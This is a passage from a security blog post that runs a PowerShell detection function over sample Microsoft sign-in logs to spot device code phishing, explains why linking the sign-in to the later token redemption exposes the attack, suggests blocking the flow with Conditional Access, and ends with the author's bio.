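Find-DeviceCodeSignIns -JsonLines ($sampleLog -split '\r?\n') | Format-Table
```

On the constructed sample this reports william.victim as High (device code sign-in from 203.0.113.10, token used from 198.51.100.77 a minute later), jane.doe as Medium (Microsoft Office is not a client that normally needs this flow here) and the admin's Azure CLI sign-in as Low; the failed attempt for user2 is skipped. The IP on the device code record itself is the victim's, so an IP-based rule that looks only at that record would miss the phish; the correlation with the later redemption is what makes it visible. Where the flow is not needed at all, it can be blocked for those users with a Conditional Access policy on the device code authentication flow.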
About Dr Nestori Syynimaa
Dr Syynimaa works as a CIO of eight cities and municipalities surrounding Tampere, the largest inland city in Nordic countries. He also runs his own consultation business Gerenios. Before moving to his current position, Dr Syynimaa worked as a consultant, trainer, and university lecturer for almost 20 years. He is a regular speaker on Office 365 and Azure security in scientific and professional conferences. Dr Syynimaa is Microsoft Certified Expert (Microsoft 365) and Microsoft Certified Trainer.